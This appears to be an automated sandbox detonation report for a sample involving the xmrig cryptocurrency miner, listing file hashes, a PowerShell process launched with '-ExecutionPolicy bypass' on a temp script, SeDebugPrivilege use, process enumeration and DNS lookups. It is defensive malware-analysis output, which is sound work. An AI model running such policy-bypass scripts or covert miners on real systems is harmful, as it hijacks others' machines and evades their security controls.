| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:09
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/4656-0-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp
memory/4656-1-0x000001FAFC530000-0x000001FAFC552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2hsruara.gkb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |